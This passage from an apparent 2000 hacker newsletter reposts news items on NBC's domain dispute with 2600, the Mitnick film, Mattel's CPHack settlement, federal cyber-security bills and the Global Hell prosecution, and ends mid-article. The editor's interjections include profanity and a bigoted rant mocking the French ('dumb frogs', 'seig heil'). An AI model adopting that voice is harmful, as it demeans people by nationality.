08:41 CST
Reposted 08:59 CST
@HWA
127.0 HNN:Mar 28th:2600 Under Fire From NBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
NBC is not happy with 2600 Magazine. 2600 has gone and registered
fucknbc.com and point the domain at nbc.com. NBC somehow feels this is
a dilution and inappropriate use of their trademark while 2600
rightfully asserts that it is nothing more than a free speech issue.
2600
ZD Net
http://www.2600.com/news/2000/0323.html
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2475126,00.html?ch
kpt
----------
(fucknbc.com? wait for it ... *snicker* ... Emmanuel, what a rebel.. - Ed)
NEW LAWSUIT THREAT FROM NBC
03/23/00
Apparently the corporate media feels it not only owns the Internet, but
that it can control opinions and expression as well.
Late Wednesday, we received the following letter via email. It concerned
one of many "freedom of expression" sites that 2600 is involved with.
----- Forwarded message -----
From: "Lusins, Gillian (NBC)" Gillian.Lusins@nbc.com To:
"'emmanuel@2600.com'" emmanuel@2600.com Subject: Website Date: Wed,
22 Mar 2000 17:43:47 -0500 X-Mailer: Internet Mail Service
(5.5.2448.0)
Dear Mr. Goldstein,
I am counsel to National Broadcasting Company, Inc. You are listed as
the technical contact for the following site: www.fucknbc.com. The
site is currently listed as belonging to "CORE - THE INTERNET COUNCIL
OF REGISTRARS, and the site is currently pointing to NBC.com. The use
of NBC's name in this domain name constitutes trademark infringment,
and is also a violation of our copyright interest in the NBC.com
site. Please be aware that a letter is being sent to the listed
owners of this site, and that if the site is not taken down
immediately, and arrangements made to cease and discontinue all use
of this name, we will pursue all necessary legal remedies including
instituting litigation in the appropriate venues. Please contact me
to discuss this matter upon receipt of this letter at
gillian.lusins@nbc.com. Thank you.
Gillian Lusins
Because e-mail can be altered electronically, the integrity of this
communication cannot be guaranteed.
----- End forwarded message -----
It's clear to us that the people at NBC have become separated from some
key bits of logic so we will try and help them out.
Free speech is at the heart of the net. While companies and other entities
are entitled to protect their trademarks, it is entirely acceptable for
sites like www.aolsucks.com, www.fuckfrance.com, and even
www.fuckgeorgewbush.com to exist without fear of harassment. We invite NBC
(or anyone else, but let's give them first crack at it) to register
fuck2600.com or 2600sucks.com. And if we feel like registering
www.nbcsucksbecausetheyhavelawyerswithtoomuch- timeontheirhands.com, no
legal threat is going to convince us not to fight for this very
fundamental freedom.
We think NBC may have been confused because we were pointing
www.fucknbc.com to www.nbc.com. Perhaps they thought we had STOLEN their
web site. We've seen bigger leaps in corporate logic so this conclusion is
entirely possible. Let us be clear - we were merely POINTING one site to
another, something that is perfectly acceptable in the world of the
Internet. If your mortal enemy decides to point his/her site at your site,
there's not a damn thing you can do about it, nor should you want to. It's
how the net works. But, since NBC has brought it up, we would like to have
this site do something more than what it's doing now. As a first step
towards this, we have pointed the site to this new material they so
graciously provided us with. We would like to see a more comprehensive
fucknbc site become established. Please email us if you'd like to put
together such a site.
And if NBC has the guts to apologize, we'll post
that too.
-=-
NBC attacks critical domain name
2600.org no longer points to the Peacock's
site, but hacker newsletter says it's another
case of cyber bullying and an attack on free
Web speech.
By Lisa M. Bowman, ZDNet News
March 27, 2000 2:45 PM PT
The hacker newsletter 2600.org has stopped
pointing the domain name f--knbc.com to the official
NBC Web site after the media company threatened
to sue.
NBC alleges that the 2600 site violated both its trademark and copyright
interests. 2600 has owned the domain name since late last year.
In an e-mail message to Emmanuel Goldstein, who runs the 2600 site, NBC
goes further than just requesting that 2600 stop pointing to NBC. It also
claims that the use of NBC's name in this way violates the law, an
assertion that raises free-speech issues.
"If the site is not taken down immediately, and arrangements made to cease
and discontinue all use of this name, we will pursue all necessary legal
remedies including instituting litigation in the appropriate venture," the
message from NBC attorney Gillian Lusins reads.
NBC officials could not immediately be reached for comment.
Can ICANN intervene? Goldstein said he hasn't received a physical letter,
and that this is just one of many such battles his group is fighting.
"We're seeing a disturbing increase in corporate intimidation," said
Goldstein, who added that 2600.org only changed the URL's destination to
call out attention to NBC's ploy. "People need to not buckle to these
scare tactics."
The letter comes as board members of ICANN -- the nonprofit private
corporation charged with doling out domain names -- are deciding whether
to add more top-level domains to the current selection that includes .com,
.org and others.
Some nonprofit stakeholders, such as Ralph Nader's Consumer Project on
Technology, have proposed adding words such as ".sucks" and ".isnotfair,"
so that people critical of a particular company or organization would have
a place to express their opinion.
However, during a recent board meeting in Cairo, Egypt, ICANN directors
didn't seem too receptive of such a plan, pointing out that critics of a
company already register domains containing those words, as in
"nbcisnotfair."
Companies fighting back However, NBC's stance shows that companies are
inclined to fight the use of such domain names, even if their efforts
thwart free speech.
NBC joins a growing list of corporations going after not only
cybersquatters who violate their trademarks, but also sites that contain
content or domains they don't like.
But they haven't been too successful in the most public cases.
In January, toy seller eToys Inc. (Nasdaq: ETYS) settled with Swiss art
group Etoy, which it had accused of trademark infringement, even though
the group had owned the domain before eToys existed.
Also, Bally Total Fitness lost an attempt to go after the owners of a
domain critical of the company that contained the Bally name.
More 2600.org targets Meanwhile, 2600.org is still making mischief, saying
it has received many proposals to provide content for the f--knbc site and
will pick the best one. Right now, the site points to the NBC letter and
2600's side of the story.
"Etoy won their battle, and we believe others will follow if we stick
together and refuse to cave in," Goldstein said. Goldstein and his cohorts
also have registered the F--kingmorons.com domain name, which leads to the
Motion Picture Association of America -- a trade group that has sued 2600
and others, claiming their plans to crack the code that encrypts DVDs
violates laws
protecting trade secrets and copyrights.
(Oh yeah, and btw, HWA sez FUCK YOU NBC! too ..d0rks - Ed)
@HWA
128.0 HNN:Mar 28th:Takedown Debuts in France
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by lamer
Securityfocus.com reports that Takedown, staring Skeet Ulrich as Kevin
Mitnick, has been released in France as "Cybertraque." Reviews so far
have been poor. The official movie web site and video clip can be
found at www.cybertraque.com
Security Focus
http://www.securityfocus.com/news/10
----------
(This must REALLY blow major chunkage to open in France... (!!?!?)... no
futher comment on this one, we might get nuclear wasted by the dumb frogs
fascist gestapo government... seig heil, besides the French mostly suck
anyways...we all know this. - Ed)
Mitnick Movie Opens in France
"Takedown" movie finally premieres... dubbed in French. By Kevin Poulsen
March 27, 2000 1:14 PM PST
It may never make it to theatres in the English speaking world, but a
controversial motion picture based on the digital manhunt that snared
hacker Kevin Mitnick debuted in France this month, to generally poor
reviews and unspectacular box office receipts.
The movie, from Miramax's genre label Dimension Films, is based on the
book "Takedown: The Pursuit and Capture of America's Most Wanted Computer
Outlaw -- By The Man Who Did It," authored by computer security
expert Tsutomu Shimomura and New York Times reporter John Markoff.
Shimomura electronically tracked Mitnick to his Raleigh, North Carolina
hideout in February, 1995, and sold the book and movie rights for an
undisclosed sum amidst the storm of publicity following the fugitive
hacker's arrest
Early versions of the screenplay for the movie adaptation of "Takedown"
cast Mitnick -- played by Scream star Skeet Ulrich -- as violent and
potentially homicidal. In July, 1998, supporters of the then-imprisoned
cyberpunk rallied against the film outside Miramax's New York City
offices. Writers later revised the script, and shooting wrapped on the
project in December, 1998.
Since then the film has languished without a US release date, amid rumors
of a direct-to-video or cable TV release.
The French-dubbed version of the 90 minute film is titled Cybertraque. It
opened on March 15th. A promotional web site features streaming video of
the theatrical trailer.
Miramax publicists didn't return phone calls about the movie. The exact
box office take of Cybertraque is unknown, but receipts failed to crack
France's top-ten list on the movie's opening weekend.
French critics have generally panned the film. A review in the French
newspaper Le Monde notes the film's problems in translating a virtual
manhunt to the action-adventure genre. "Can the repeated image of
faces sweating over keyboards renew the principles of the Hollywood
thriller?," the paper asks. "It's easy to say that the filmmaker hardly
reaches that point, regardless of his saturation of the soundtrack with
rock music to defeat the boredom of the viewer." (translated)
Mitnick cracked computers at cell phone companies, universities and ISPs.
He pleaded guilty in March, 1999, to seven felonies, and was released from
prison on January 21st, 2000, after nearly five years in custody.
Last month he testified before a Congressional committee on governmental
computer security.
@HWA
129.0 HNN:Mar 28th:Mattel Buys Rights to CPHack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by evenprime
CPhack, a program that allows people to defeat Cyber Patrol as well as
lists all webs sites filtered by the software, has been bought by
Mattel. The authors of the program have signed a seven page assignment
agreement that gives Mattel "all rights" to the program's source code
and binaries. The rights to the program were sold for one dollar and
agreement to drop the lawsuit against them.
Wired
http://www.wired.com/news/politics/0,1283,35216,00.html
----------
Mattel Stays on the Offensive by Declan McCullagh
2:45 p.m. Mar. 27, 2000 PST BOSTON -- Upping the stakes in a battle
over a utility that reveals Cyberpatrol's list of off-limits websites,
Mattel threatened mirror sites with contempt charges during a court
hearing Monday afternoon.
Mattel, which sells Cyberpatrol, said the toy giant had acquired the
copyright to "cphack" from the two cryptoanalysts who published it on
their website earlier this month in a settlement agreement signed on March
24.
Citing a March 16 Slashdot thread that said "it's time to mirror!", Mattel
attorney Irwin Schwartz advised against anyone thinking of distributing
cphack from now on.
"They should be afraid of being hauled into court on contempt
proceedings," Schwartz told the judge.
Just 25 minutes before the hearing was scheduled to begin, Mattel filed
documents with the court saying it was ready to abandon its lawsuit over
cphack, which allows owners of Cyberpatrol to view the program's secret
encrypted blacklist.
As part of the agreement, Mattel said it wanted a permanent court order
that applied to mirror sites, too.
The American Civil Liberties Union, which is representing three mirror
sites, said it did not object to the lawsuit's dismissal -- but it wanted
to make sure its clients would not be at risk.
ACLU attorney Chris Hansen asked U.S. District Judge Edward Harrington to
exempt mirror sites from his order, saying Mattel could simply file
another suit if it suspected violations of its new copyright.
"My clients do not want to be put to the test of contempt," Hansen said.
Contempt citations could include fines or jail time.
At the end of the hearing, which lasted one hour, Harrington said he would
consider Hansen's request and decide by Wednesday. Harrington said he
would continue his earlier temporary restraining order until then.
But he indicated he was a little worried about an order that would apply
to people who aren't defendants, saying "they have not been heard."
The seven-page "assignment agreement" signed by cphack co-author Eddy
Jansson of Sweden gives Mattel "all rights" to the program's source code
and binaries and an explanatory essay he wrote. Co-author Matthew Skala of
Canada signed a similar agreement giving up his rights for one
dollar.
@HWA
130.0 HNN:Mar 28th:Cyber Security Bill Passes Committee
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
S. 1993 has been approved by the Senate Governmental Affairs Committee
last Thursday. The bill will provide "a comprehensive framework" for
protecting federal computer records against cyber-attacks by outside
attackers.
Government Executive Magazine
http://www.govexec.com/dailyfed/0300/032400b2.htm
----------
March 24, 2000
DAILY BRIEFING
Senate panel approves cyber-security mandates
By Spencer Rich, National Journal News Service
The Senate Governmental Affairs Committee on Thursday approved legislation
(S. 1993) to provide "a comprehensive framework" for protecting federal
computer records against cyber-attacks by outside hackers.
The bill also seeks to guard against unauthorized disclosures caused by
accidental or careless procedures in handling and protecting information.
Co-sponsored by Committee Chairman Fred Thompson, R-Tenn., and Ranking
Democrat Joseph Lieberman of Connecticut, the bill passed by voice vote.
The Clinton Administration had worked with the committee to iron out some
issues in the original version of the bill, according to committee aides.
When the bill was first introduced last Nov. 19, Thompson complained that
"federal agencies continue to use a band-aid approach to computer security
rather than addressing the systemic problems which make government systems
vulnerable to repeated computer attacks."
"Hopefully, the recent breaches of security at the various 'dot.com'
companies is the wake-up call needed to focus attention on the security of
government computer systems," Thompson said.
At that time, Lieberman also observed, "Government computers are rife with
sensitive information ... on national security, the strength of our
economy, transportation and communications systems and the personal lives
of millions of citizens"�as well as the mechanisms for controlling weapons
of mass destruction, tracking the offensive movements of enemy states and
controlling the economy and threats to public health. All these appeared
vulnerable to computer hijacking, he said.
Yet, Lieberman said, the General Accounting Office had found that a test
unit it set up could crack computerized information systems controlling
spacecraft and information gleaned by space exploration, obtain access to
State Department networks, veterans' records, tax records and benefit and
demographic information. In some cases, the test unit found it would have
been able to alter the information in these systems if it wanted to do
mischief, he said.
Thompson said the weaknesses of the computer information system were
essentially a management issue.
To correct this, the bill approved Thursday would set up a tight chain of
command and responsibility for strengthening and protecting computer
records. It would stretch from the director of the Office and Management
and Budget at the top to individual departments and agencies below. Each
one's progress in developing plans to strengthen computer security and
protecting information would be monitored peridiodically by an outside
agency, such as the GAO.
Each government agency would have to develop a security plan, switch to
procedures identified as "best practices,"and make sure the relevant
employees are properly informed and trained, under the bill.
At the head of this chain of command would be the OMB director. Under him,
Thompson explained at Thursday's committee meeting, the deputy OMB director
for management "will be responsible for seeing that agencies do what they
should in non-defense areas," and the Secretary of Defense and the Director
of Central Intelligence would have similar responsibility with regard to
national security, defense and other "classified information systems."
"They must adopt progams and plans that will make us secure," Thompson
added.
Thompson said the GAO would monitor the various computer security programs
at departments and agencies annually. "This will make it as secure as
possible," said Lieberman: "an annual plan and independent audit" of each
agency.
According to the committee, the bill, as approved, would:
Establish clear federal agency accountability for information
security. Require each agency to have an annual independent
evaluation. Give the Defense Secretary and CIA director responsibility
for national security and other classified information system
security. (Addition of this provision was one of the major changes
made in the original bill by the substitute text, staff aides said.)
Give agency managers flexibility to attract the "best and brightest
technology talent through the use of scholarships, fellowships and
federal service agreements." (This was another major change made by
the substitute text, the aides said.) Focus on the importance of
training programs.
An amendment by Sen. Daniel Akaka, D-Hawaii, added by voice vote, would
require agencies to report on the time periods and resources needed to
implement agencywide
security programs.
@HWA
131.0 HNN:Mar 28th:Census Gets NSA to Look at Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Evil Wench
In an effort to protect the private information of millions of
Americans the Commerce Department has asked the NSA to test its online
security systems.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp
----------
Census tests security
BY Judi Hasson 03/27/2000
The Census Bureau has hired a company to try to break into its
Internet site and brought in the super-secret National Security Agency to
test Census security systems.
Census officials said they are certain the data is safe but want to
make sure there are no vulnerable spots.
"Every day, people are scanning our ports. It�s not just our site.
It�s any site, said J. Gary Doyle, who is responsible for systems
integration at the Census Bureau.
Among the steps that the Census Bureau has taken to protect the
decennial count:
* Hiring the technology firm Science Applications
International Corp. to try to break into the Census� Internet site,
where respondents can file online. SAIC began working last week, and
there have been no reports of successful entry into the site.
* Enlisting NSA to make sure the site is secure.
* Erecting firewalls to prevent penetration. Among the precautions:
prohibiting e-mail from entering the site unless there is
a specific address on it and barring outside computers from dialing
up the census computer in the building.
* Encrypting all census data from the time it leaves a data scanning
center via a secure telephone line until it arrives at the
Census computer center in Bowie, Md.
* Making three copies of the data and storing it in different vaults.
* Providing backup systems at the Bowie computer center, including
generators and air conditioners.
The Census Bureau�s precautions have gotten high marks from security
experts inside and outside government
"Census is using all of the proper security practices," said Richard
Smith, vice president of federal operations at Internet Security
Systems Inc. "I would guess the
likelihood of someone getting in is small."
(Chant with me: "I hate faulty formatting routines ...down with buggy
software!" yeh I know, i'll do it myself one of these days, sure, right
after I buy that MS stock ... -Ed)
@HWA
132.0 HNN:Mar 28th:Icomlib 1.0.0 Final Released
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Javaman
Icomlib is an API for the ICOM PCR1000 computer controlled receiver
for UNIX OS's. Currently it has been officially tested to support
SunOS, *BSD, and Slackware 7 Linux, SuSE Linux. Along with the API
there is a GUI based on the Qt 2.x toolkit for X that supports
multiple styles (CDE style, Motif Stle, Win95 Style, SGI Style). It
also include command line applications that implement all of the
functions in the api, as well as additional functions like logging,
and log-hit scanning.
Philtered
http://www.philtered.net/projects.phtml
----------
@HWA
133.0 HNN:Mar 28th:China Bans MP3s
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by lamer
In an effort to impose some sort of control over electronic commerce,
China's The Ministry of Culture has announced laws that ban online
sales of imported music and videos and exclude foreign invested
Internet companies from selling any audiovisual products. This of
course would include MP3s.
ABC News
http://www.abcnews.go.com/sections/tech/DailyNews/china_mp3ban000325.h
tml
----------
@HWA
134.0 HNN:Mar 29th:MostHated to Plead Guilty
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by McIntyre
MostHated (Patrick W. Gregory) is expected to plead guilty to charges
of one count of conspiracy to commit telecommunications fraud in the
U.S. District Court of the Northern District of Texas. The charges
stem form the defacement of the White House web page last May.
MostHated is thought to be the leader of Global Hell, a group that has
taken credit for defacing over 100 web sites. He could receive up to
five years in prison, $250,000 in fines and forced to pay up to $2.5
million in restitution.
ABC News
Attrition.org - Mirrors of Global Hell Defacements
http://abcnews.go.com/sections/tech/DailyNews/globalhell000329.html
http://www.attrition.org/mirror/attrition/gh.html
----------
March 29 � The co-leader of a teenage
cybergang that allegedly hacked into 115 Web
sites is expected to plead guilty to conspiracy,
marking a victory for the federal government in
one of the biggest computer crimes cases yet.
Patrick W. Gregory of Houston and dozens of his
teenage cohorts defaced Web sites, deleted data and
crashed servers, causing as much as $2.5 million in
damages, according to court documents.
The group, which went by the names �total-Ka0s� and
�Global Hell,� became a national concern after officials
said it hacked the White House site on May 9. The
breach prompted the Secret Service temporarily to shut
down White House access to the Internet while it
scrambled to block the security flaw.
The hackers replaced the government�s site with the
words, �Why did we hack this domain? Simple, we
f***ing could.�
�What makes this so scary from a government
standpoint is you�ve got a bunch of kids between 16 and
27 and all of a sudden they start getting on conference
calls coordinating their attacks on company after
company, just like them going down and vandalizing 14
houses on a block in a row,� said Matt Yarbrough, who
was the lead federal prosecutor on the case and is now an
e-commerce attorney for Vinson & Elkins of Dallas.
�MostHateD�
Gregory, 19, has agreed to plead guilty to one count of
conspiracy to commit telecommunications fraud and
computer hacking, according to documents filed in the
U.S. District Court of Northern District of Texas.
Gregory, who used the online moniker �MostHateD,�
has signed a plea agreement admitting he and other Global
Hell members used the Internet to hack into 115
computer systems around the world between January
1997 and May 1999, the court documents say.
He was expected to plead guilty in federal court in
Dallas today but the hearing has been postponed,
Assistant U.S. Attorney Reid Wittliff said. The plea
hearing will likely be rescheduled for sometime in the next
few weeks.
He could receive up to five years in prison and
$250,000 in fines. He could also be ordered to pay up to
$2.5 million in restitution.
�These people would have never come together in one
place and been so coordinated if Patrick hadn�t been the
driving force behind that,� Yarbrough said. �Essentially,
Patrick was the ringleader, the front man and media mind
of Global Hell, and the scary force that scared the heck
out of companies.�
In an exclusive interview with Brian Ross of ABC�s
20/20 in December, Gregory said the White House and
other victims should be thankful for Global Hell because
the hackers used their computer genius to spot security
loopholes in the computer system they target.
�If you can get into the high security like that, you�re
going to be proud,� Gregory said. �You had the
knowledge to do something nobody else in the world
could do.�
Hackers Plotted on Net
Gregory admitted, in the plea agreement, to stealing
telephone conferencing services from AT&T, MCI, Sprint
and Latitude Communications worth tens of thousands of
dollars.
He and other members of Global Hell illegally acquired
telephone numbers, personal identification numbers and
credit card numbers and used them to hold hours of
conference calls, during which they would discuss
hacking, according to court documents.
The group also discussed their hacking plans on
Internet chat rooms, specifically on one called �#creep,�
the documents said.
Once they gained unauthorized access to the computer
systems, Gregory and the group�s other members placed
various codes, files, programs and services on them, the
court papers said.
�Global Hell Will Not Die�
Typically, the hackers defaced the Web pages of the
victims� sites, replacing them with text and graphics
relating to �Global Hell.� The U.S. Army�s page, for
example, was replaced with the message, �Global Hell is
alive. Global Hell will not die.�
The hackers also intentionally deleted data and
crashed some of the computer systems, causing hundreds
of thousands of dollars in damages in some cases.
�These damages were sometimes financial and
sometimes intangible, including the loss of faith in the
organizations and �brand name� due to the public
defacements of their Web sites,� the plea agreement says.
Authorities say Gregory personally participated in the
hacking of at least three Web sites: 1688.com, the
American Retirement Corp.�s site, and Blue Byte
Software�s site. After hacking into 1688.com, a design
firm, on April 27, 1999, he stole banking information and
e-mail passwords and posted them on the Internet, court
documents say.
Cohorts Convicted
Two other Global Hell members have already been
convicted.
The Global Hell member who hacked into the White
House, 19-year-old Eric Burns of Shoreline, Wash.,
pleaded guilty in federal court last November and was
sentenced to 15 months in prison and ordered by the
judge not to touch a computer for three years after that.
Earlier this month, Chad Davis, 20, of Ashwaubenon,
Wis., was sentenced to six months in prison for accessing
and altering the Army�s Web site.
The judge also ordered that Davis pay $8,054 in
restitution to the Army for the cost of restoring the Web
site; serve three years of supervised release after the
six-month prison term; not have contact with anyone from
Global Hell; and gain approval from future employers to
use the Internet.
�If it�s used wisely, it will carry you over the rainbow,�
U.S. District Judge J.P. Stadtmueller said of the Internet.
�But you got yourself involved with something that took
you down a very different path, causing a problem for one
branch of government. �This is a deadly serious business.
It�s not something that�s a sandbox play tool.�
@HWA
135.0 HNN:Mar 29th:FBI Wants New Laws to Make Their Work Easier
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
FBI director Louis Freeh has suggested changes to the law that would
help track down cyber criminals and make it easier to keep pace with
the fastest-growing area of cyber crime in the United States.
(Whhhaaaaa, my job is too hard, please pass some laws to make it
easier.)
C|Net
http://news.cnet.com/news/0-1005-200-1595429.html?dtn.head
----------
FBI cracks down on increasing cybercrimes By Reuters Special to CNET News.com
March 28, 2000, 12:40 p.m. PT
WASHINGTON--The number of cybercrimes being investigated by the FBI has
doubled in the past year, and last month's attacks on leading Web sites
are the tip of the iceberg, FBI director Louis Freeh said today.
Addressing a Senate subcommittee of cybercrime, Freeh suggested changes to
the law that would help track down cybercriminals and make it easier to
keep pace with the fastest-growing area of crime in the United States.
In 1998, Freeh said the FBI opened 547 "computer
intrusion" cases, and this more than doubled to 1,154
last year. In 1998, the FBI closed 399 of those cases
and 912 last year.
"In short, even though we have markedly improved our
capabilities to fight cyberintrusions, the problem is
growing even faster," he told the committee.
Cyberthreats included disgruntled employees, hackers
who "cracked" into networks for the thrill of it or
for financial gain, and virus writers.
Criminal groups and terrorist organizations also used technology more to
raise funds, spread propaganda and communicate with each other.
Freeh declined to give details of the attacks last month on business Web
sites such as Yahoo, eBay and Amazon.com, as these are under
investigation. But he said the attacks were "the tip of the iceberg" and
demonstrated the ease with which such crimes could be committed.
Freeh said U.S. laws have not kept pace with fast-changing technology,
adding that the FBI is working with the Justice Department to propose a
legislative package to update laws.
Responding to his comments, Democratic Sen. Charles Schumer from New York
said laws are set up at a "sub-sonic" speed at a time when the process
should be faster than the speed of light.
Freeh said he does not want "extraordinary powers," just enough to deal
with the phenomenal changes that have accompanied the Internet.
One problem is that to track down a cybercriminal, court orders often have
to be issued in several states. "There is a needless waste of time and
resources, and a number of important investigations are either hampered or
derailed entirely in those instances," Freeh said.
The use of administrative subpoenas would enable investigators to work
more efficiently, he said.
Senators on the committee said some companies are reluctant to report
cybercrimes for fear of harming their stock prices.
The president of the Information Technology Association of America, Harris
Miller, told the committee that few high-tech firms are interested in
being seen by customers as active law enforcement agents.
"No company wants information to surface that they have given in
confidence that may jeopardize their market position, strategies, customer
base or capital investments," he said.
Asked about the cooperation of foreign governments, Freeh cited the United
States' close relationship with Canada. A couple of weeks ago, Freeh said
an FBI office in New Haven picked up an online statement from a youth who
said he felt like "shooting up a school."
A 14-year-old in a small Canadian town was tracked down and found to have
access to explosives and other weaponry.
Over the New Year's period, Freeh said he had close contact with Far East
and Middle Eastern countries and that FBI agents there had been given
access to computers and hard drives to investigate threats against
Americans.
Freeh said that he visited six areas in the Gulf recently, and all
mentioned cybercrime. "The Internet has no boundaries or sovereignty," he
said.
Story Copyright � 2000 Reuters Limited. All rights reserved.
@HWA
136.0 HNN:Mar 29th:Banks Warned to Carefully Screen New Recruits
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
In preparation for the upcoming Stop the City protests London police
are warning banks to be extra careful screening applicants and to look
for people with with 'cyber-spy tendencies'. Police fear that
anarchist sympathizers may try to infiltrate companies and sabotage
computer systems in support of the protests.
The Register UK
http://www.theregister.co.uk/000328-000016.html
----------
Posted 28/03/2000 12:14pm by Linda Harrison
Watch out! There's a Cyberterrorist about
London police are warning banks to look out for cyber terrorists when
recruiting staff.
Anarchist sympathisers may try to infiltrate companies and sabotage
computer systems to help the anti-City protests expected in May, a
senior crime prevention officer said yesterday.
Norman Russell, head of the City of London police community safety branch,
said firms should grill new staff for any cyber-spy tendencies.
Job applicants who support the aims of anarchist umbrella group People's
Global Action might help demonstrators enter company buildings
during the forthcoming Stop the City protests. Alternatively, they could
insert viruses in computer files or leak passwords to let hackers
penetrate computer systems, the Mail on Sunday reports.
And Russell's advice to spot these saboteurs?
"Employers should make sure that they take up references of new
employees."
Sound advice. The Register has gone further, and compiled a few suspicious
comments to help employers when they are interviewing City slicker
applicants.
Anyone letting slip comments like "Bring the Capitalist dogs to their
knees!" Or "Cream the City fat cats!" should definitely be treated
with caution.
As should utterances along the lines of: "The roar of profit and plunder
will be replaced by the sounds of rhythms of party and pleasure as a
massive carnival of resistance snakes its way through the square mile."
(genuine quote - Reclaim the Streets).
But in case these cyber-saboteurs have become more CV-savvy, it may be as
well to develop your own techniques to pinpoint a likely candidate.
The Register welcomes any tips on how to spot a likely lord or lady of
misrule.
Meanwhile, a new nation has emerged to take the cyberwarfare crown.
According to Newsbytes, Canada is now a hotbed of cyberterrorism,
responsible for 80 per cent of foreign attacks on US computers.
FBI director Louis Freeh went so far as to describe this normally
law-abiding Mounty nation as a "hacker haven".�
Related stories
Anarchists run riot on the Web
City faces up to hack attack
-=-
Fuck i'm sick of seeing "Cyber" in all these lame stories ... - Ed
@HWA
137.0 HNN:Mar 29th:CPHack Was GPL'd, Mattel Left Holding the Bag
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Fredrick
Mattell may not have gotten exactly what it thought when it purchased
the copyright to CPHack. CPHack reveals Cyberpatrol's secret list of
off-limits web sites as well as methods to circumvent the program.
CPHack was released under the GNU Public license which grants the
recipient of the software the right to copy, distribute or modify the
program. Legal experts say that that right can not be revoked.
Wired
http://www.wired.com/news/politics/0,1283,35226,00.html
----------
Mattel Suit Takes GNU Twist by Declan McCullagh
3:00 a.m. Mar. 28, 2000 PST BOSTON -- Mattel's claim of victory
Monday in a lawsuit over its Cyberpatrol filtering software may be
premature.
The toy giant said during a court hearing here that it had acquired
intellectual property rights to a program that reveals Cyberpatrol's
secret list of off-limits websites and settled the case. Mattel said it
planned to use its new copyright in court to ban Internet copying of
the "cphack" utility.
But cphack's authors released it under the GNU General Public License,
which appears to permit unlimited distribution of the original cphack
program, even if Mattel now owns the copyright.
"Once you do that you can't revoke it," said Bennett Haselton of
Peacefire, a group opposed to filtering software that temporarily put up
its own cphack mirror site.
The Free Software Foundation's GPL agreement says that "the recipient
automatically receives a license from the original licensor to copy,
distribute or modify the program."
Translation: A copyright holder can't change his mind.
"GPL is software that cannot be revoked," said Eben Moglen, a law
professor at Columbia University and FSF general counsel. "Anyone
downstream who possesses a copy of the software may redistribute it.
"It's a very amusing case," Moglen said. "If people are going to respond
to free software they don't like by trying to wipe it out, they're in for
some real trouble."
A spokeswoman for Mattel reached late Monday said she didn't know what the
effect of the GPL would be.
But she said cphack authors Eddy Jansson and Matthew Skala had signed a
contract with Mattel and if there was any deception, "they'd be in big
trouble."
The agreement with Jansson gives "all rights, if any" to the cphack source
and object code and accompanying essay to Mattel.
The agreement also states that Jansson and Skala attest they "are the sole
proprietors of all rights" involved with cphack and have "not assigned"
them to anyone else.
Even if Mattel cannot claim exclusive copyright in cphack, it may be able
to pursue lawsuits on other grounds.
@HWA
138.0 HNN:Mar 29th:White House Staffer Gives Away Phone Access Codes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by William Knowles
For giving out long distance White House telephone access codes a U.S.
Army Sergeant has been arrested. The codes allowed 9,400 calls worth
$50,000 to be placed to locations around the world.
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html
----------
See the ISN story.
@HWA
139.0 HNN:Mar 29th:Another DVD Work Around on PlayStation 2
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by acopalyse
This time fans have discovered a way to exploit the game console's
analog RGB output to copy DVD content to a videotape, circumventing
the system's copy-protection technology. The technique is being
discussed on Japanese web sites. (Wonder if this will have any impact
on the current MPAA and DeCSS case.)
TechWeb
http://www.techweb.com/wire/story/TWB20000324S0007
----------
Second Backdoor Found In
Playstation 2
(03/24/00, 3:44 p.m. ET) By Yoshiko Hara, EE Times
Video enthusiasts in Japan have found a
second backdoor in Sony Computer
Entertainment's newly launched Playstation
2.
This time, fans have discovered a way to exploit the
game console's analog RGB output to illegally copy
DVD content to a videotape, circumventing the
system's copy-protection technology. The technique is
being discussed on Japanese websites.
The discovery of such a flaw is another blow to Sony,
already embarrassed earlier this month when users in
Japan found a way into Playstation 2 to subvert a
geographical code for DVD video disks.
So far, the issue has not raised the ire of movie studios
or others in the consumer electronics industry.
However, it could accelerate a movement that's quietly
forming behind the scenes to develop a new copy
protection scheme for the legacy analog RGB interface
used both in Playstation 2 and on PCs.
At issue is whether Sony Computer Entertainment has
violated a DVD industry agreement that prohibits DVD
players from having an analog RGB interface. If so, it's
possible that Hollywood studios could take some action
against Sony.
But some in the industry pointed out this week that
Sony could make the case that Playstation 2 is not a
stand-alone DVD player, but a PC. Under the DVD
specs, PCs are permitted an RGB output. So far,
however, Sony has not resorted to this argument.
Sony Computer Entertainment acknowledged on
Wednesday that problems with copy protection can
arise from the use of an analog RGB interface, but said
